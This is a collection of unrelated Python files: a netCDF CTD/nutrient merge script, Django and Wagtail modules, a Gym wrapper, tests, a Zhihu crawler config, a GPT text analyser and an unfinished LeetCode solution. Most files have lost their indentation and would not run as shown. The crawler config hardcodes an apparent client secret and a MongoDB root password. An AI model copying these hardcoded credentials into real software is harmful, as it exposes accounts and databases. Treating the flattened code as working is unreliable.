help="full path to config file - ctdpnut_epickeys.yaml",
)
parser.add_argument("-v", "--verbose", action="store_true", help="output messages")
parser.add_argument(
"-csv", "--csv", action="store_true", help="output merged data as csv"
)
args = parser.parse_args()
# Get all netcdf files from mooring directory
ctd_ncfiles = [
args.ctd_ncpath + f for f in os.listdir(args.ctd_ncpath) if f.endswith(".nc")
]
nut_ncfiles = [
args.nut_ncpath + f for f in os.listdir(args.nut_ncpath) if f.endswith(".nc")
]
# get config file for output content
if args.config_file_name.split(".")[-1] in ["json", "pyini"]:
EPIC_VARS_dict = ConfigParserLocal.get_config(args.config_file_name, "json")
elif args.config_file_name.split(".")[-1] in ["yaml"]:
EPIC_VARS_dict = ConfigParserLocal.get_config(args.config_file_name, "yaml")
else:
sys.exit("Exiting: config files must have .pyini, .json, or .yaml endings")
# loop through all ctd files - skip files without downcast for now
for ind, cast in enumerate(ctd_ncfiles):
nut_cast = cast.split("/")[-1].replace("_ctd", "_nut")
print(
"Merging {ctdfile} and {nutfile}".format(
ctdfile=cast, nutfile=(args.nut_ncpath + nut_cast)
)
)
###nc readin/out
df = EcoFOCI_netCDF(cast)
global_atts = df.get_global_atts()
vars_dic = df.get_vars()
ncdata = df.ncreadfile_dic(output="vector")
ncdata_coords = [ncdata.pop(x, "-9999") for x in ["time", "time2", "lat", "lon"]]
df.close()
if "depth" in vars_dic:
ncdata["dep"] = ncdata["depth"]
### read paired nut file
try:
ncdata_nut = {}
dfn = EcoFOCI_netCDF(args.nut_ncpath + nut_cast)
global_atts_nut = dfn.get_global_atts()
vars_dic_nut = dfn.get_vars()
ncdata_nut = dfn.ncreadfile_dic(output="vector")
dfn.close()
except Exception:
print("No matched Nutrient Data from cast:ctd{}".format(global_atts["CAST"]))
print("Copy CTD file to output dir")
copyfile(cast, args.output + cast.split("/")[-1])
if args.csv:
nc_only = pd.DataFrame.from_dict(ncdata)
nc_only.to_csv(args.output + nut_cast.replace("nut.nc", "ctd.csv"))
continue
data_dic = {}
# prep dictionary to send to netcdf gen
try:
data_dic.update({"dep": ncdata_nut["depth"][:].round()})
except KeyError:
data_dic.update({"dep": ncdata_nut["dep"][:].round()})
# check for all variables in ctdfile
for key in EPIC_VARS_dict.keys():
if key in ncdata.keys():
if args.verbose:
print("{} as defined found in ctd nc file".format(key))
else:
if args.verbose:
print("{} as defined not in ctd nc file".format(key))
# using config file, build datadic by looping through each variable and using
for key in EPIC_VARS_dict.keys():
if not key in ncdata.keys():
try:
data_dic.update({key: ncdata_nut[key][:]})
if args.verbose:
print("{} as defined found in nut nc file".format(key))
except KeyError:
if args.verbose:
print("{} as defined not in nut nc file".format(key))
cruise = args.CruiseID.lower()
# build complete dataframe from nuts to match to ctd
try:
nut_df = pd.merge(
pd.DataFrame.from_dict(ncdata),
pd.DataFrame.from_dict(data_dic),
how="outer",
on=["dep"],
)
except Exception:
print("Failed Merger - skip cast:ctd{}".format(global_atts["CAST"]))
print("Copy CTD file to output dir")
copyfile(cast, args.output + cast.split("/")[-1])
if args.csv:
nc_only = pd.DataFrame.from_dict(ncdata)
nc_only.to_csv(args.output + nut_cast.replace("nut.nc", "mergefailed.csv"))
continue
if args.csv:
nut_df.to_csv(args.output + nut_cast.replace("nut.nc", "merged.csv"))
else:
history = ":File created by merging {nutfile} and {ctdfile} files".format(
nutfile=nut_cast, ctdfile=cast.split("/")[-1]
)
# build netcdf file - filename is castid
### Time should be consistent in all files as a datetime object
# convert timestamp to datetime to epic time
profile_name = args.output + nut_cast.replace("nut", "merged")
ncinstance = EcF_write.NetCDF_Create_Profile(savefile=profile_name)
ncinstance.file_create()
ncinstance.sbeglobal_atts(
raw_data_file=args.ctd_ncpath.split("/")[-1]
+ ","
+ args.nut_ncpath.split("/")[-1],
CruiseID=cruise,
Cast=cast,
)
ncinstance.dimension_init(depth_len=len(nut_df))
ncinstance.variable_init(EPIC_VARS_dict)
ncinstance.add_coord_data(
depth=nut_df["dep"].values,
latitude=ncdata_coords[2],
longitude=ncdata_coords[3],
time1=ncdata_coords[0],
time2=ncdata_coords[1],
)
ncinstance.add_data(EPIC_VARS_dict, data_dic=nut_df.to_dict("list"))
ncinstance.add_history(history)
ncinstance.close()
|
from .lib.sql_util import *
from .lib.mysql_lib import *
from .lib.pg_lib import *
from .lib.global_lib import *
from .gpss.data_pb2_grpc import *
from .gpss.data_pb2 import *
from .gpss.gpss_pb2_grpc import *
from .gpss.gpss_pb2 import *
|
from ..environment import Environment
import gym
#import roboschool
import torch
import numpy as np
class Gym_base(Environment):
def __init__(self, env_params):
super(Gym_base, self).__init__(env_params)
env_params = self.ingest_params_lvl1(env_params)
self.env = None
self.action_space = None
self.obs_space = None
self.obs_high = None
self.obs_low = None
self.observation = None
self.reward = 0.  # Cumulative episode reward
self.done = False
self.info = {}
self.iteration = 0 # State
self.minimize = False
self.target = 999999 # Infinity, max score
self.RAM = env_params["RAM"]
self.IMG = env_params["IMG"]
self.discrete = env_params["Discrete"]
def ingest_params_lvl1(self, env_params):
assert type(env_params) is dict
default_params = {
"env name": "MsPacman-v0",
"scoring type": "score",
"populations": False, # Population-based optimization
"RAM": False,
"IMG": False,
"Discrete": True
}
default_params.update(env_params) # Update with user selections
return default_params
def init_env(self, name):
self.env = gym.make(name) # Location
#self.env._max_episode_steps = 50000
self.action_space = self.env.action_space
self.obs_space = self.env.observation_space
self.obs_high = self.obs_space.high
self.obs_low = self.obs_space.low
observation = self.env.reset()
self.set_obs(observation)
def set_obs(self, x):
if self.RAM:
self.observation = torch.Tensor(x).cuda()
else:
x = np.moveaxis(x, -1, 0)
x = torch.Tensor(x).cuda()
self.observation = x.unsqueeze(0)
def set_obs_(self, x):
self.observation = x
def step(self, action):
"""Instantiates the plotter class if a plot is requested by the user."""
if self.discrete:
action = np.argmax(action)
else:
action = np.array([action])
#action = np.expand_dims(action, 0)
#action = self.get_random_action()
observation, reward, self.done, self.info = self.env.step(action)
self.reward += reward
self.set_obs(observation)
self.iteration += 1
def evaluate(self, _):
return self.reward
def reset_state(self):
self.iteration = 0
observation = self.env.reset()
self.set_obs(observation)
self.reward = 0.  # Cumulative episode reward
self.done = False
self.info = {}
def get_random_action(self):
action = self.action_space.sample()
return action
def render(self):
self.env.render()
def close(self):
self.env.close()
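# Hypothetical usage sketch (parameter names follow ingest_params_lvl1 above);
# note that set_obs moves observations to the GPU, so a CUDA device is assumed.
#   env = Gym_base({"env name": "CartPole-v1", "RAM": True, "Discrete": True})
#   env.init_env("CartPole-v1")
#   env.step(env.get_random_action())
#   score = env.evaluate(None)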
|
import struct
from shared.lmdb_support import serialize_tuple_of_integers
def test_able_to_serialize():
data = (2506, 723526)
expected_output = b'\xca\t\x00\x00\x00\x00\x00\x00F\n\x0b\x00\x00\x00\x00\x00'
assert serialize_tuple_of_integers(data) == expected_output
def test_serialization_is_correct():
original_data = (2506, 723526)
expected_output = b'\xca\t\x00\x00\x00\x00\x00\x00F\n\x0b\x00\x00\x00\x00\x00'
output = serialize_tuple_of_integers(original_data)
assert output == expected_output
assert struct.unpack("<2Q", output) == original_data
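# A minimal reference implementation consistent with the tests above; it is a
# sketch only (assumes each integer is packed as a little-endian unsigned
# 64-bit word) and the real shared.lmdb_support version may differ internally.
def _reference_serialize_tuple_of_integers(values):
    # Pack every integer as a little-endian unsigned 64-bit word.
    return struct.pack("<{}Q".format(len(values)), *values)
def test_reference_implementation_matches_expected_layout():
    data = (2506, 723526)
    expected_output = b'\xca\t\x00\x00\x00\x00\x00\x00F\n\x0b\x00\x00\x00\x00\x00'
    assert _reference_serialize_tuple_of_integers(data) == expected_output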
|
import pyexcel as p
from common import get_fixtures
RANGE_COLOR = ['#313695', '#4575b4', '#74add1', '#abd9e9',
'#e0f3f8', '#ffffbf',
'#fee090', '#fdae61', '#f46d43', '#d73027', '#a50026']
def test_pie_chart():
s = p.get_sheet(file_name=get_fixtures('pie.csv'))
s.save_as('pie.echarts.html', chart_type='pie')
def test_kline_chart():
s = p.get_sheet(file_name=get_fixtures('kline.csv'))
s.save_as('kline.echarts.html', chart_type='kline', legend='daily k')
def test_radar_chart():
s = p.get_sheet(file_name=get_fixtures('radar.csv'))
s.save_as('radar.echarts.html', chart_type='radar')
def test_bar_chart():
s = p.get_sheet(file_name=get_fixtures('bar.csv'))
s.save_as('bar.echarts.html', chart_type='bar')
def test_scatter3d_chart():
s = p.get_sheet(file_name=get_fixtures('scatter_3d.csv'))
s.save_as('scatter3d.echarts.html', chart_type='scatter3d',
is_visualmap=True,
visual_range_color=RANGE_COLOR)
def test_bar3d_chart():
s = p.get_sheet(file_name=get_fixtures('bar3d.csv'))
s.save_as('bar3d.echarts.html', chart_type='bar3d',
is_visualmap=True, visual_range_color=RANGE_COLOR,
visual_range=[0, 20],
grid3D_width=200, grid3D_depth=80)
def test_heatmap_chart():
s = p.get_sheet(file_name=get_fixtures('bar3d.csv'))
s.save_as('heatmap.echarts.html', chart_type='heatmap',
is_visualmap=True, visual_range_color=RANGE_COLOR,
visual_range=[0, 20],
visual_text_color="#000", visual_orient='horizontal')
def test_effectscatter_chart():
s = p.get_sheet(file_name=get_fixtures('effectscatter.csv'))
s.save_as('effectscatter.echarts.html', chart_type='effectscatter')
def test_funnel_chart():
s = p.get_sheet(file_name=get_fixtures('funnel.csv'))
s.save_as('funnel.echarts.html', chart_type='funnel')
def test_line_chart():
s = p.get_sheet(file_name=get_fixtures('line.csv'))
s.save_as('line.echarts.html', chart_type='line')
def test_gauge_chart():
s = p.get_sheet(file_name=get_fixtures('gauge.csv'))
s.save_as('gauge.echarts.html', chart_type='gauge')
|
from call_views import *
from views import *
|
'''
models.py contains the persistence logic for Snakr.
'''
from django.db import models
from django.core.validators import URLValidator
from django.utils.translation import ugettext_lazy as _
from ipaddress import IPv6Interface, IPv4Interface, IPv6Address, IPv4Address, ip_interface
from snakraws import settings
from snakraws.utils import get_hash
TABLE_PREFIX = 'snakraws'
EVENT_TYPE = {
'B': _('Blacklisted'),
'D': _('Debug'),
'E': _('Error'),
'I': _('Information'),
'L': _('New Long URL Submitted'),
'N': _('Short URL Inactive'),
'R': _('Existing Long URL Resubmitted'),
'S': _('Short URL Redirect'),
'U': _('Short URL Unrecognized/Not Resolvable'),
'W': _('Warning'),
'X': _('Exception'),
'Z': _('Unknown Event'),
}
DEFAULT_EVENT_TYPE = 'Z'
HTTP_STATUS_CODE = {
200: _('OK (200)'),
301: _('Redirect (301)'),
302: _('Redirect (302)'),
400: _('Bad Request (400)'),
403: _('Forbidden (403)'),
404: _('Not Found (404)'),
422: _('Unprocessable Entity (422)'),
500: _('Server Exception (500)'),
0: _('No response')
}
DEFAULT_HTTP_STATUS_CODE = 403
DEFAULT_URL_ID = get_hash('unknown')
UNSPECIFIED_URL_ID = get_hash('unspecified')
_USE_EXISTS = getattr(settings, 'USE_IF_DIM_EXISTS', False)
class DimGeoLocation(models.Model):
id = models.AutoField(
primary_key=True
)
hash = models.BigIntegerField(
unique=True,
null=False
)
is_mutable = models.BooleanField(
default=True,
null=False
)
providername = models.CharField(
max_length=50,
null=False
)
postalcode = models.CharField(
unique=True,
max_length=32,
null=False
)
lat = models.DecimalField(
max_digits=7,
decimal_places=4,
null=True
)
lng = models.DecimalField(
max_digits=7,
decimal_places=4,
null=True
)
city = models.CharField(
max_length=100,
null=True
)
regionname = models.CharField(
max_length=100,
null=True
)
regioncode = models.CharField(
max_length=2,
null=True
)
countryname = models.CharField(
max_length=100,
null=True
)
countrycode = models.CharField(
max_length=2,
null=True
)
countyname = models.CharField(
max_length=100,
null=True
)
countyweight = models.DecimalField(
max_digits=5,
decimal_places=2,
null=True
)
allcountyweights = models.CharField(
max_length=100,
null=True
)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimgeolocations' % TABLE_PREFIX
def __str__(self):
return '[ %d, "%s", "%s", "%s", "%s" ]' % (self.hash, self.postalcode, self.city, self.regionname, self.countryname)
def __unicode__(self):
return u'[ %d, "%s", "%s", "%s", "%s" ]' % (self.hash, self.postalcode, self.city, self.regionname, self.countryname)
class DimDevice(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
deviceid = models.CharField(
unique=True,
max_length=40,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimdevices' % TABLE_PREFIX
def __str__(self):
return self.deviceid
def __unicode__(self):
return self.deviceid
class DimHost(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
hostname = models.CharField(
unique=True,
max_length=253,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimhosts' % TABLE_PREFIX
def __str__(self):
    return self.hostname
def __unicode__(self):
    return self.hostname
class DimIP(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
ip = models.CharField(
unique=True,
max_length=39,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimips' % TABLE_PREFIX
def __str__(self):
return self.ip
def __unicode__(self):
return self.ip
def save(self, *args, **kwargs):
super(DimIP, self).save(*args, **kwargs)
@property
def is_ipv4(self):
    return isinstance(ip_interface(self.ip), IPv4Interface)
@property
def is_ipv6(self):
    return isinstance(ip_interface(self.ip), IPv6Interface)
@property
def ipv4(self):
    if self.is_ipv6:
        v4 = self.ipv6.ipv4_mapped
        if not v4:
            v4 = self.ipv6.sixtofour
    else:
        v4 = IPv4Address(self.ip)
    return v4
@property
def ipv6(self):
    if self.is_ipv4:
        return None
    return IPv6Address(self.ip)
@property
def address(self):
    if self.is_ipv6:
        return self.ipv6.exploded
    else:
        return self.ipv4.exploded
class DimReferer(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
referer = models.CharField(
max_length=1024,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimreferers' % TABLE_PREFIX
def __str__(self):
return self.referer
def __unicode__(self):
return self.referer
class DimUserAgent(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
useragent = models.CharField(
max_length=8192,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimuseragents' % TABLE_PREFIX
def __str__(self):
return self.useragent
def __unicode__(self):
return self.useragent
class LongURLs(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
longurl = models.CharField(
max_length=4096,
validators=[URLValidator()],
null=False,
blank=False)
originally_encoded = models.BooleanField(
null=False)
is_active = models.BooleanField(
null=False)
title = models.CharField(
max_length=100,
null=False,
blank=True)
description = models.CharField(
max_length=300,
null=False,
blank=True)
image_url = models.CharField(
max_length=4096,
validators=[URLValidator()],
null=True,
blank=False)
byline = models.CharField(
max_length=100,
null=False,
blank=True)
site_name = models.CharField(
max_length=100,
null=False,
blank=True)
meta_status = models.IntegerField(
unique=False,
null=False)
meta_status_msg = models.CharField(
max_length=1024,
null=False,
blank=True)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_longurls' % TABLE_PREFIX
def __str__(self):
return self.longurl
def __unicode__(self):
return self.longurl
class ShortURLs(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
longurl = models.OneToOneField(
"LongURLs",
db_column="longurl_id",
to_field="id",
unique=True,
null=False,
on_delete=models.CASCADE)
shorturl = models.CharField(
max_length=40,
validators=[URLValidator()],
null=False,
blank=False)
shorturl_path_size = models.SmallIntegerField(
null=True)
compression_ratio = models.DecimalField(
max_digits=10,
decimal_places=2,
null=True)
is_active = models.BooleanField(
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_shorturls' % TABLE_PREFIX
def __str__(self):
return self.shorturl
def __unicode__(self):
return self.shorturl
class FactEvent(models.Model):
id = models.AutoField(primary_key=True)
event_yyyymmdd = models.CharField(
max_length=8
)
event_hhmiss = models.CharField(
max_length=6
)
event_type = models.CharField(
max_length=1,
null=False
)
cid = models.CharField(
max_length=40,
null=False
)
http_status_code = models.SmallIntegerField(
null=False
)
info = models.CharField(
max_length=8192,
null=False)
longurl = models.ForeignKey(
'LongURLs',
db_column="longurl_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
shorturl = models.ForeignKey(
'ShortURLs',
db_column="shorturl_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
geo = models.ForeignKey(
'DimGeoLocation',
db_column="geo_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
device = models.ForeignKey(
'DimDevice',
db_column="device_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
host = models.ForeignKey(
'DimHost',
db_column="host_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
ip = models.ForeignKey(
'DimIP',
db_column="ip_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
referer = models.ForeignKey(
'DimReferer',
db_column="referer_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
useragent = models.ForeignKey(
'DimUserAgent',
db_column="useragent_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_factevents' % TABLE_PREFIX
def __str__(self):
return "%d" % self.id
def __unicode__(self):
return "%d" % self.id
class Blacklist(models.Model):
id = models.AutoField(primary_key=True)
created_on = models.DateTimeField(
null=False
)
is_active = models.BooleanField(
null=False
)
geo = models.ForeignKey(
'DimGeoLocation',
db_column="geo_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
device = models.ForeignKey(
'DimDevice',
db_column="device_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
host = models.ForeignKey(
'DimHost',
db_column="host_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
ip = models.ForeignKey(
'DimIP',
db_column="ip_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
referer = models.ForeignKey(
'DimReferer',
db_column="referer_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
useragent_id = models.ForeignKey(
'DimUserAgent',
db_column="useragent_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_blacklist' % TABLE_PREFIX
def __str__(self):
return "%d" % self.id
def __unicode__(self):
return "%d" % self.id
|
from django.conf.urls import include
from django.contrib import admin
from django.urls import re_path
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.core import urls as wagtail_urls
from wagtail.documents import urls as wagtaildocs_urls
urlpatterns = [
re_path(r"^django-admin/", admin.site.urls),
re_path(r"^admin/", include(wagtailadmin_urls)),
re_path(r"^documents/", include(wagtaildocs_urls)),
re_path(r"", include(wagtail_urls)),
]
|
import sys
import argparse
import pathlib
import os
import ast
from typing import *
from lib.lightning_train import generate_trainer
import torch
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
from models.lib.data import GeneExpressionData
from models.lib.neural import GeneClassifier
import helper
from os.path import join, dirname, abspath
from helper import download, list_objects
from models.lib.lightning_train import DataModule, generate_trainer
if __name__ == "__main__":
data_path = join(pathlib.Path(__file__).parent.resolve(), '..', 'data', 'interim')
for file in ['retina_T.csv', 'retina_labels_numeric.csv']:
    if not os.path.isfile(join(data_path, file)):
        print(f'Downloading {file}')
        download(
            remote_name=join('jlehrer', 'retina_data', file),
            file_name=join(data_path, file),
        )
|
# -*- coding: UTF-8 -*-
import os
# MongoDB connection configuration
# MONGO_URI = 'mongodb://%s:%s@%s:%s/admin' % ('username', 'password', 'ip', 'port')
MONGODB_URI = 'mongodb://%s:%s@%s:%s/admin' % ('root', '123456', '127.0.0.1', '27017')
# Important: do not modify
CLIENT_ID = '8d5227e0aaaa4797a763ac64e0c3b8'
CLIENT_SECRET = 'ecbefbf6b17e47ecb9035107866380'
# Login parameters
LOGIN_DATA = {
'client_id': CLIENT_ID,
'grant_type': 'password',
'source': 'com.zhihu.android',
'timestamp': '',
'username': '',
'password': ''
}
# Default path where the token is saved
TOKEN_PATH = os.environ['HOME'] + '/zhihu_crawler/zhihu.token'
# Log file
LOG_PATH = os.environ['HOME'] + '/zhihu_crawler/zhihu.log'
# LOG_PATH = 'zhihu.log'
# Zhihu API root URL
API_URL = 'https://api.zhihu.com'
# Whether a captcha is required
CAPTCHA_URL = API_URL + '/captcha'
# Sign in
LOGIN_URL = API_URL + '/sign_in'
# Personal profile
MYSELF_PROFILE_URL = API_URL + '/people/self'
# User-related operations; fill {} with the user ID
PEOPLE_URL = API_URL + '/people/{}'
# Users I follow (followees)
PEOPLE_FOLLOWEES_URL = PEOPLE_URL + '/followees'
# Users who follow me (followers)
PEOPLE_FOLLOWERS_URL = PEOPLE_URL + '/followers'
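# Illustrative only: how LOGIN_DATA is typically filled in before being posted
# to LOGIN_URL (the exact timestamp format expected by the API is an
# assumption, and the credentials below are placeholders):
#   payload = dict(LOGIN_DATA)
#   payload.update({'timestamp': str(int(time.time() * 1000)),
#                   'username': 'your-account', 'password': 'your-password'})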
|
class RegionTopology:
@classmethod
def num_edges(cls):
return 4
@classmethod
def num_corners(cls):
return 4
@classmethod
def _edge_name_to_index_dict_(cls):
return {'U': 0, 'D': 1, 'L': 2, 'R': 3}
@classmethod
def _edge_name_to_index_(cls, _edge_name_):
return {'U': 0, 'D': 1, 'L': 2, 'R': 3}[_edge_name_]
@classmethod
def _edge_index_to_name_dict_(cls):
return {0: 'U', 1: 'D', 2: 'L', 3: 'R'}
@classmethod
def _edge_index_to_name_(cls, _edge_index_):
return {0: 'U', 1: 'D', 2: 'L', 3: 'R'}[_edge_index_]
@classmethod
def _edge_pairing_(cls):
return {'U': 'D', 'D': 'U', 'L': 'R', 'R': 'L'}
@classmethod
def _edge_index_pairing_(cls):
return {0: 1, 1: 0, 2: 3, 3: 2}
@classmethod
def _corner_name_to_index_dict_(cls):
return {'UL': 0, 'DL': 1, 'UR': 2, 'DR': 3,
'LU': 0, 'LD': 1, 'RU': 2, 'RD': 3}
@classmethod
def _corner_name_to_index_(cls, _corner_name_):
return {'UL': 0, 'DL': 1, 'UR': 2, 'DR': 3,
'LU': 0, 'LD': 1, 'RU': 2, 'RD': 3}[_corner_name_]
@classmethod
def _corner_index_to_name_(cls, _corner_index_):
return {0: 'UL', 1: 'DL', 2: 'UR', 3: 'DR'}[_corner_index_]
@classmethod
def _edge_corner_local_numbering_(cls, _edge_index_):
"""
Notice the values are always increasing.
"""
return {0: (0, 2), # the Upper-side has corners locally numbered 0, 2.
1: (1, 3), # the Down-side has corners locally numbered 1, 3.
2: (0, 1), # the Left-side has corners locally numbered 0, 1.
3: (2, 3)}[_edge_index_]
@classmethod
def _axis_indix_dict_(cls):
return {'x': 0, 'y': 1}
@classmethod
def _edge_axis_distribution_(cls):
"""
Here 'U':(0,0) means the U edge is perpendicular to the 0-axis and at the
starting side. 'D':(0,-1) means the 'D' edge is perpendicular to the 0-axis but
at the end side, so -1. And 'R':(1,-1) means the 'R' edge is perpendicular to
1-axis and at the end side. And so on.
"""
return {'U': (0, 0), 'D': (0, -1), 'L': (1, 0), 'R': (1, -1)}
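# A small self-check illustrating the conventions documented above (purely
# illustrative, not part of the original module):
if __name__ == '__main__':
    assert RegionTopology._edge_pairing_()['U'] == 'D'
    assert RegionTopology._edge_axis_distribution_()['U'] == (0, 0)
    assert RegionTopology._edge_corner_local_numbering_(
        RegionTopology._edge_name_to_index_('U')) == (0, 2)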
|
from typing import List
import spacy
import string
from src.lm_core import GPTLM
from .utils import plot_topk, draw_wordcloud, scatter_plot
import streamlit as st
nlp = spacy.load("en_core_web_sm")
gpt = GPTLM()
def analyse_text(articles: List, filters=None, probs_plot=False, starting_idx=0,
                 path="data/"):
# from nltk.corpus import stopwords
################
# import nltk
# nltk.download('stopwords')
###############
# curated stop_words
if filters=="stopwords":
with open("stopwords-en.txt") as f:
content = f.readlines()
stop_words = set([x.strip() for x in content] + list(string.punctuation))
top_10_cnt, word_dict_10, probs_10 = 0, {}, []
top_100_cnt, word_dict_100, probs_100 = 0, {}, []
top_1000_cnt, word_dict_1000, probs_1000 = 0, {}, []
top_x_cnt, word_dict_x, probs_x = 0, {}, []
for article in articles:
article_list = article.split("\n\n")
# sen = ""
# for s in article_list:
# if len((s + sen).split(' ')) < 800:
# sen = sen + " " + s
# article = sen[1:]
if filters=="ents":
doc = nlp(article)
ent_list = [ent.text for ent in doc.ents]
np_list = [str(token) for token in doc if token.tag_[:2] == "NN"]
for sentence in article_list:
#for sentence in [article]:
if len(sentence.split(" ")) > 5:
text = gpt.tokenizer.bos_token + " " + sentence
outputs = gpt.get_probabilities(text, top_k=1000)
for idx, (rank, probs) in enumerate(outputs['true_topk'][starting_idx:]):
flag = True
if filters=="ents" and (outputs['bpe_strings'][idx + 1] not in ent_list): # or outputs['bpe_strings'][idx + 1] not in np_list):
flag = False
elif filters=="stopwords" and outputs['bpe_strings'][idx + 1] in stop_words:
flag = False
if flag:
if rank <= 10:
top_10_cnt += 1
word_dict_10[outputs['bpe_strings'][idx + 1]] = probs
# TODO: can include wordcloud for this too.
probs_10.append(outputs['pred_topk'][idx][0][1])
elif rank <= 100:
top_100_cnt += 1
word_dict_100[outputs['bpe_strings'][idx + 1]] = probs
probs_100.append(outputs['pred_topk'][idx][0][1])
elif rank <= 1000:
top_1000_cnt += 1
word_dict_1000[outputs['bpe_strings'][idx + 1]] = probs
probs_1000.append(outputs['pred_topk'][idx][0][1])
elif rank>1000:
top_x_cnt += 1
word_dict_x[outputs['bpe_strings'][idx + 1]] = probs
probs_x.append(outputs['pred_topk'][idx][0][1])
data = {'top_10': top_10_cnt, 'top_100': top_100_cnt, 'top_1000': top_1000_cnt, 'top_x': top_x_cnt}
plot_topk(data, path=path)
draw_wordcloud(word_dict_10, word_dict_100, word_dict_1000, word_dict_x, path=path)
if probs_plot:
col1, col2, col3, col4 = st.beta_columns(4)
scatter_plot(probs_10, col1, path=path+"scatter_col1.jpg")
scatter_plot(probs_100, col2, path=path+"scatter_col2.jpg")
scatter_plot(probs_1000, col3, path=path+"scatter_col3.jpg")
scatter_plot(probs_x, col4, path=path+"scatter_col4.jpg")
#scatter_plot(probs_10, probs_100, probs_1000, probs_x)
|
class PayGateway(object):
'''
    @summary: the base class for pay gateways
'''
def create_order(self, orderItemObj, clientIp, **kwargs):
pass
def query_order(self, orderNo):
'''
@summary: query pay result of order
@return: PayResult
'''
pass
def process_notify(self, requestContent):
'''
@summary: process notify from pay interface
@return: PayResult
'''
pass
def generate_qr_pay_url(self, productid):
'''
@summary: create url that can be used to generate qr code
@return: url
'''
pass
def process_qr_pay_notify(self, requestContent):
'''
@summary: process qr notify
        @return: product id, uid
'''
pass
class PayResult(object):
def __init__(self, orderNo, succ=True, lapsed=False):
self.orderno = orderNo
self.succ = succ
self.lapsed = lapsed
@property
def OrderNo(self):
'''
        @summary: order No of merchant
'''
return self.orderno
@property
def Succ(self):
'''
@summary: True: paid successfully
'''
return self.succ
@property
def Lapsed(self):
'''
@summary: True: order is lapsed
'''
return self.lapsed
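# Illustrative sketch only (not part of the original module): one way a concrete
# gateway might implement the interface above. The order-number format and the
# always-successful query below are hypothetical placeholders.
class DummyPayGateway(PayGateway):
    def create_order(self, orderItemObj, clientIp, **kwargs):
        # A real gateway would call the provider's API here; this just echoes
        # a fake merchant order number.
        return 'ORDER-%s' % id(orderItemObj)
    def query_order(self, orderNo):
        # Pretend every queried order was paid and has not lapsed.
        return PayResult(orderNo, succ=True, lapsed=False)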
|
from django.urls import path
from .views import Providers, SetVariables
urlpatterns = [
path('set_variables/<slug:dns>/', SetVariables.as_view(), name="set-vars"),
path('all', Providers.as_view(), name="dns-providers"),
]
|
import socket
class BaseBackend(object):
"""
Base class for backend reporting storage.
settings_namespace is a class attribute that will be used to get the needed
parameters to create new backend instance from a settings file.
"""
settings_namespace = None
def report(self, name, metric, value, tags, id_):
        raise NotImplementedError()
def _get_host_name(self):
return socket.gethostname()
def _get_payload(self, name, value, tags):
payload = {'host': self._get_host_name(), 'name': name}
if isinstance(value, dict):
payload.update(value)
else:
payload['value'] = value
if tags:
payload['tags'] = tags
return payload
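# Illustrative sketch only: a minimal backend showing how report() is expected
# to build on _get_payload(). The settings_namespace value and the in-memory
# list are hypothetical, not part of the original module.
class ListBackend(BaseBackend):
    settings_namespace = 'LIST_BACKEND'
    def __init__(self):
        self.reports = []
    def report(self, name, metric, value, tags, id_):
        # Keep the normalized payload in memory instead of shipping it anywhere.
        self.reports.append(self._get_payload(name, value, tags))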
|
# Time: O(n^2)
# Space: O(n)
# 1301 biweekly contest 16 12/28/2019
# Given a square board of chars. You move on the board from the bottom right square marked with the char 'S'.
#
# You need to reach the top left square marked with the char 'E'. The rest of the squares are labeled
# either with a numeric char 1, 2, ..., 9 or with an obstacle 'X'. In one move you can go up, left or
# up-left (diagonally) only if there is no obstacle there.
#
# Return a list of two integers: the first integer is the maximum sum of numeric chars you can collect,
# and the second is the # of such paths that you can take to get that maximum sum, taken modulo 10^9 + 7.
#
# In case there is no path, return [0, 0].
# Constraints:
# 2 <= board.length == board[i].length <= 100
class Solution(object):
def pathsWithMaxScore(self, board): # USE THIS
M, n = 10**9+7, len(board)
dp = [[0, 0] for _ in range(n+1)] # bottom pad row, right pad column, so all cells processed uniformly
for i in range(n-1, -1, -1):
ndp = [[0, 0] for _ in range(n+1)]
for j in range(n-1, -1, -1):
if board[i][j] == 'S':
ndp[j] = [0, 1]
elif board[i][j] != 'X':
for score, ways in (ndp[j+1], dp[j+1], dp[j]):
